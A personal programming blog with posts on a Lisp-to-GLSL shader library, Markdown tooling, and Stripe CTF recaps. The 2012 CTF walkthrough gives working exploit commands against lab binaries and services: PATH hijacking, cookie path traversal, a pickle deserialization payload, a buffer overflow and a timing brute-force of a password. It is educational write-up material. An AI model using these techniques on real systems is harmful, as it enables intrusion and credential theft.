3bgl-shader alpha release
Sun, 21 Sep 2014 17:13:17 CDT

One of the things I have been working on off and on for the last few years is a DSL for translating something resembling Common Lisp to GLSL. Recently, I finally got around to combining the various pieces into something approximately usable, and the result is 3bgl-shader.

It is still a bit rough, in particular most of the error messages are pretty bad. The main features (type-inference, dependency tracking, and interactive usage) seem to be working reasonably well though.

The video also shows something else I've been working on recently, which is a hack to show an xterm within a 3d scene, using the X Composite extension. That part is even rougher, to the point it doesn't even start up reliably. When it does start, it works reasonably well, and I even managed to get a nested draw loop working on *debugger-hook* so it can be used to debug code running in an emacs displayed on the xterm from within the code being debugged.

Just a quick note so I can find it again
Sun, 21 Sep 2014 00:00:00 CDT

To get a full backtrace in sbcl debugger (including from slime sldb) with all of the internals involved in signalling the error:

(setf sb-debug:*stack-top-hint* 'sb-debug::invoke-interruption)

before triggering the error.

Useful when there is a problem with the internals, and the stack trace wouldn't otherwise show the interesting frames.

Blogging again
Sat, 28 Jun 2014 00:00:00 CDT

Trying to get started blogging again, so finally uploaded some old posts that had been waiting on me to tweak the colorization a bit, and some info about recent 3bmd changes.

3bmd updates

3bmd is a Markdown processor implemented in Common Lisp, with various extensions.

Thanks to Vsevolod Dyomkin, it now has an extension to support some of the PHP Markdown Extra table format, so

| Left  | Center Aligned  | Right |
| :------------ |:---------------:| -----:|
| *marked up*      | some wordy text | 123 |
| plain | **centered** | 4 |

renders as

Left        Center Aligned    Right
marked up   some wordy text     123
plain       centered              4

Unlike the original PHP Markdown Extra tables, the | delimiters are required on both sides of each row.

Thanks to Gábor Melis, 3bmd can also output markdown, for example after making modifications to the parsed document.

Unfortunately the internal parse tree is still pretty ugly and not an officially supported API yet, so expect it to change at some point.

Stripe CTF 3
Thu, 20 Feb 2014 00:00:00 CST

Stripe had their third "Capture the Flag" at the end of January (more info here and here). Didn't do as well on this one as on the first one, but at least managed to get second on the 'gitcoin' level.

A combination of factors kept me from finishing:

  • Sleep deficit from the microcorruption.com CTF the week before.
  • Trying to use CL for all the problems and trying to use unfamiliar/unfinished libraries.
  • Not liking the format.
    While the problems were interesting, the presentation as "trying to build something useful/important" instead of "trying to find and exploit flaws" as in CTF1 or microcorruption made it feel sort of odd to be hacking together the ugliest thing that could possibly work, or to be focused exclusively on speed at the expense of generality or maintainability.
  • The biggest problem though, was just focusing too much on gitcoin mining :)
Level 0

Level 0 was effectively just a simple (buggy) spell checker: read whitespace-delimited character sequences, downcase them, and look them up in a dictionary. Finally, print each character sequence, surrounding it in <> if not found in the dictionary, and preserving the whitespace.

Just reading the dictionary into a hash table was good enough to pass and get to #201 on the leaderboard. Unfortunately someone mentioned the fast solution (Bloom filters) in IRC, and from what I understand the fastest solutions were limited mostly by the timing wrapper, so I wasn't as motivated to try any of the ideas I had for improving my solution (like memory mapping the dictionary file and doing a binary search directly in that, or indexing it in advance and only loading pieces).
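For reference, the Bloom-filter idea people were discussing can be sketched in a few lines. This is my own illustration (sizes and hash scheme invented for the example), not anyone's actual contest entry:

```python
import hashlib

class BloomFilter:
    def __init__(self, size_bits=1 << 20, num_hashes=7):
        self.size = size_bits
        self.k = num_hashes
        self.bits = bytearray(size_bits // 8)

    def _positions(self, word):
        # Derive k bit positions from overlapping slices of one SHA-1 digest.
        digest = hashlib.sha1(word.encode()).digest()
        for i in range(self.k):
            chunk = int.from_bytes(digest[i * 2:i * 2 + 4], "big")
            yield chunk % self.size

    def add(self, word):
        for pos in self._positions(word):
            self.bits[pos // 8] |= 1 << (pos % 8)

    def __contains__(self, word):
        # May give a false positive, never a false negative -- acceptable
        # for a spell checker that only needs "probably in the dictionary".
        return all(self.bits[pos // 8] & (1 << (pos % 8))
                   for pos in self._positions(word))

bf = BloomFilter()
for w in ["hello", "world"]:
    bf.add(w)
```

The entire filter fits in 128KB here, so lookups stay in cache, which is where the speed advantage over a general hash table comes from.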

Level 1

Level 1 is where I spent most of my time. The goal was to write a miner for a git-based cryptocoin called "gitcoin". To mine a gitcoin, you have to successfully push a commit with a hash less than a specified "difficulty" value. To pass the level, you have to get a commit before a set of bots push a commit, which happens every 90 seconds or so. After that, there is an option to play against other players.

The provided example is a shell script that just calls git commands to check hashes. Considering that at the initial difficulty the odds of getting a valid hash are about 50% after 11 million tries, starting a new process for every try is probably a bad idea.
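As a sanity check on that number: it is consistent with roughly a 24-bit difficulty target (my inference from the quoted odds), via the geometric distribution:

```python
import math

p = 2 ** -24   # assumed chance that one random hash beats the target
# Tries needed for a 50% chance of at least one success:
n = math.log(0.5) / math.log(1 - p)
print(round(n))   # about 11.6 million
```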

The obvious first optimization is just to move the hashing loop into a single process. That takes a bit of work, since you need to replicate the way git hashes commits correctly, then make sure you can pass the data to git (or some git wrapper library) so it gets the same hash when it creates the actual commit.

Originally, I was calling git commit-tree and trying to get the GIT_AUTHOR_* and GIT_COMMITTER_* environment variables set properly so git would create the same commit I had hashed. That worked, but I eventually switched to the easier method of just doing git hash-object -wt commit.
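Replicating git's hashing is straightforward once you know the object format: git prepends a header of the form "commit <byte length>\0" to the raw commit text and SHA-1s the result. A quick sketch (the commit body and function name here are my own example):

```python
import hashlib

def git_commit_hash(body: bytes) -> str:
    # Git hashes b"commit <size>\x00" + body, where <size> is the
    # body length in bytes, decimal, with no padding.
    header = b"commit %d\x00" % len(body)
    return hashlib.sha1(header + body).hexdigest()

body = (b"tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904\n"
        b"author A U Thor <a@example.com> 1390000000 +0000\n"
        b"committer A U Thor <a@example.com> 1390000000 +0000\n"
        b"\n"
        b"Gitcoin attempt 0\n")
print(git_commit_hash(body))
```

Feeding the same body to git hash-object -t commit --stdin should print the same digest, which is exactly the property the miner depends on.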

I think with just doing hashes in CL (using ironclad for SHA1), I was at around 150k hash/sec, enough to beat the bots to finish the level, but not enough for the PvP bonus round.

After the basic hashing and git operations are working, the next step is to take advantage of the fact that SHA1 hashes in blocks and each commit starts with the same header. We can hash just the header, then save the state of the hash at that point and reuse it for each attempt, which speeds up the hashing by 3-4x. That and some other optimizations eventually got the pure-CL miner to about 650-700k hash/sec, at which point it was time to break out the OpenCL.
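The same trick is easy to demonstrate with Python's hashlib, whose hash objects support copy(): hash the fixed prefix once, then clone the saved state for each nonce. This is a sketch of the idea, not the actual CL/OpenCL code (and a real SHA-1 kernel would save midstate at a block boundary rather than at an arbitrary byte offset):

```python
import hashlib

# Stand-in for the fixed git header plus the unchanging part of the commit.
prefix = b"commit 272\x00tree ...fixed header bytes..."
base = hashlib.sha1(prefix)   # hash the shared prefix exactly once

def try_nonce(nonce: int) -> str:
    h = base.copy()           # reuse the saved state instead of rehashing prefix
    h.update(b"nonce %d\n" % nonce)
    return h.hexdigest()
```

Each attempt now hashes only the nonce suffix, which is where the 3-4x speedup comes from when the fixed prefix dominates the message length.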

I had written part of a bitcoin miner as a test for my CL OpenCL library, so I could reuse some of that. I just needed to replace the double SHA256 kernel with a single round of SHA1, and connect it to git instead of a bitcoin client.

Due to lack of sleep and not remembering how the old code worked, that probably took longer than it should have. I made lots of simple mistakes like miscounting the number of characters to put in the commit message to get an even number of SHA1 blocks, or miscounting the number of bits in the message to put in the SHA1 header.

Once that worked though, it was hashing at 950MHash/sec on a GTX 780, quite a bit faster than the CPU miners (fast C miners were up to ~5-10MH/s per core, some running on a few machines). Eventually the other GPU miner woke up, and made it obvious that I needed to work on my git code, since I was losing despite having about 5x the hash rate.

I was originally running single threaded, so I would stop hashing while waiting for git operations to complete, which took from a second or two for a pull up to 5 or 6 seconds for a successful push. Switching to multiple threads allowed hashing to continue while checking for new commits on the server, keeping the effective hash rate closer to peak. It also allowed starting work on the next coin while pushing, which is a pretty strong advantage when the difficulty is low enough (as it was at that point) to find multiple coins before a push finishes.
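The resulting structure is just a hashing worker that never blocks on git. A toy sketch of the shape (timings and names invented; the real miner was CL, not Python):

```python
import threading
import time

hashes = 0
stop = threading.Event()

def mine():
    # Keep hashing until told to stop; a real miner would test nonces here
    # instead of just counting iterations.
    global hashes
    while not stop.is_set():
        hashes += 1

worker = threading.Thread(target=mine)
worker.start()
time.sleep(0.1)   # stand-in for a slow "git push" on the main thread
stop.set()
worker.join()
```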

It took a few tries to get the threading working right though. I originally over-thought things and divided up the work poorly, leading to some races.

For a while I stopped mining and later was only mining for one 15-minute round per hour, due to not liking the way the scoring was working out with a wide range of hash rates. The scoring was a combination of some points per round for everyone that got at least 1 coin, and ELO ranking between the people that got coins. The problem with that is that people who manage to get 1 or 2 coins get penalized in the ELO part, possibly lowering their overall score, while people with lower hash rate that didn't get any coins stay at the same score.

The organizers increased the per-round bonus partway through to help avoid the problems with ELO only affecting people fast enough to get coins, which seems to have helped. Unfortunately I didn't think through the implications of the increased bonus, so left my miner running only 1 round in 4 overnight and missed out on a bunch of points.

Eventually a few other people finished GPU miners and some people with access to clusters (or EC2 instances) were running a few hundred MH/sec on CPUs, so I switched my miner to use binary nonces in the commit message rather than converting them to ASCII in the OpenCL kernel. That improved the hash rate to over 1GH/sec, and I added in the AMD A8-5600K APU on a different machine for another 160MH/sec, until it locked up the machine.

From there it was just a question of people looking for more GPUs or more machines, and waiting for the final score. I tried adding a HD 6870, but unfortunately the machine with a free PCI-E slot also had sata connectors in the way, so my final hash rate was only 1.2GH/s. One of the people with a cluster was around 1.1GH/s for a while, but ran into heat problems, and the final winner was running 4.2GH/s at the end.

Level 2

Level 2 is where I started running into problems with my choice of language and libraries. The task for the level was to write a proxy for some web services to filter out a DDoS attack.

The first problem I ran into is that one of the libraries I wanted to use built a shared library, but the paths changed between the build and test environments, so it couldn't find the library. They fixed the paths quickly once I figured out what the problem was, but it took a while to work out what was happening.

After that, I ran into problems getting the various libraries I tried to use working together, and one of them wasn't as finished as I'd thought it was. In the end, I gave up and just modified the example node.js script.

Rejecting requests from IPs that had made more than 4 requests in the last 200 ms, or that had already been rejected a few times (unless the server was idle), was enough to pass, but didn't score very well.
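That filter amounts to a per-IP sliding-window rate limit. A minimal sketch of the counting part, using the thresholds described above (everything else, including the retry penalty and the idle-server exception, is omitted):

```python
import time
from collections import defaultdict, deque

WINDOW = 0.2        # 200 ms
MAX_REQUESTS = 4

recent = defaultdict(deque)   # ip -> timestamps of requests inside the window

def allow(ip, now=None):
    now = time.monotonic() if now is None else now
    q = recent[ip]
    # Drop timestamps that have fallen out of the 200 ms window.
    while q and now - q[0] > WINDOW:
        q.popleft()
    if len(q) >= MAX_REQUESTS:
        return False          # too many recent requests: reject
    q.append(now)
    return True
```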

Level 3

The task for level 3 was a "code search" web service, which would index a set of files on demand, then respond to queries with a set of files containing the requested word.

Level 3 is where I gave up, after again running into problems with my code not running on the test server and not feeling like trying to debug it.

Stripe CTF
Mon, 12 Mar 2012 00:00:00 CDT

Stripe recently presented a set of challenges to "capture the flag" by finding and exploiting security vulnerabilities in a series of setuid binaries and web services. Now that the CTF is officially over, here is a summary of how I captured the flag:

Level 1

Level 1 is pretty easy: a setuid binary calls another program (date) without specifying a path, so we just need to create our own date program (or shell script), make it executable, then run the provided binary with our date first on the PATH.

$ echo /bin/cat /home/level02/.password > date
$ chmod +x date
$ PATH=. /levels/level01
Level 2

Level 2 gives us a PHP script that uses the contents of a cookie to construct a filename, then sends the contents of the file back to the user. We just need to send a relative path to the password file as the value of that cookie.

$ curl -u level02 --digest \
       --cookie user_details="../../home/level03/.password" \
Level 3

Level 3 gets a bit harder. It gives another SUID binary, with a disabled function to call an arbitrary program. Unfortunately it neglects to check for negative numbers when validating input, so we can fall off the front of its function pointer table instead of going past the end. With a bit of poking around in gdb and careful choice of index, we can hit the other argument passed to the program, and store a pointer to the run function there, at which point we are back to calling another program without specifying a path, as in level 01.

$ echo 00000000: 5b870408 | xxd -r > run
$ echo /bin/cat /home/level04/.password > `cat run`
$ chmod +x `cat run`
$ PATH=. /levels/level03 -28 `cat run`
Level 4

Level 4 is another setuid binary, this time with a pretty obvious buffer overflow.

char buf[1024];
strcpy(buf, str);

A quick web search turns up a nice review of why buffer overflows are bad, including a program to automate generating a string to pass to the program in order to exploit the overflow.

Unfortunately, the CTF binaries are 32-bit, and the system doesn't seem to be set up to compile 32-bit binaries, so the exploit program can't guess the proper stack address... back to gdb to get an address and hard-code it, at which point we run into another problem: "Address Space Layout Randomization."

Attempting to disable ASLR using setarch didn't seem to help, so back to the web to find a more recent example of why buffer overflows are bad, even with ASLR. The ret2eax strategy from that paper combined with the previous code lets us use the buffer overflow to run a shell as level05, at which point we can just read the password directly.

Level 5

Level 5 gives us a Python web service to exploit. Looking around in the source leads to a suspicious regex: '^type: (.*?); data: (.*?); job: (.*?)$'. A quick test with ; job: in the data passed to the service verifies it does in fact parse it incorrectly, so we can pass arbitrary data to the job field.

Tracing through the code more carefully, the job value is a class instance serialized/deserialized using pickle, which apparently should not be used with untrusted data. If we can make the deserialization code execute arbitrary commands, we just need to have it copy the password somewhere we can read it:

$ chmod o+w .
$ curl localhost:9020 -d "; job: cos
(S'cp /home/level06/.password `pwd`/ ; chmod 777 `pwd`/.password'
$ cat .password
Level 6

Level 6 goes back to another setuid binary, this time without any obvious way to inject our own code into it to take control. Luckily it makes the mistake of doing something as soon as it finds a mismatch between the guess and the real password, so if we can figure out a way to detect that, we can try 1 character at a time and see which one it doesn't complain about.

Since it also makes the mistake of printing something every time it checks a character, we can arrange to kill it after it makes a certain number of checks by sending the output to a pipe, then closing the other end of the pipe.

$ mkfifo foo
$ head -c 34 foo & sleep 0.1 ; /levels/level06 /home/the-flag/.password aa 2> foo

The above lets level06 print 34 characters ("Welcome to the password checker!", a newline, and one "."), then closes the reader on the pipe, killing level06 with SIGPIPE. If the first character was wrong, it prints the "Ha ha, your password is incorrect!" message before being killed on the "." from the second character.

Adding in a quick loop lets us test a range of characters reasonably quickly:

$ for a in {0..9} {a..z} {A..Z} ; do
> echo $a
> head -c34 foo & sleep 0.1
> /levels/level06 /home/the-flag/.password "$a"a 2> foo
> sleep 0.1
> done

Then just scroll up to see which didn't give an error ("t"), add that to the beginning of the guess, and repeat to find the next character:

$ for a in {0..9} {a..z} {A..Z} ; do
> echo $a
> head -c35 foo & sleep 0.1
> /levels/level06 /home/the-flag/.password t"$a"a 2> foo
> sleep 0.1
> done

and so on until we get to 5 for character 24, and no match for character 25, at which point we have the whole password theflagl0eFTtT5oi0nOTxO5.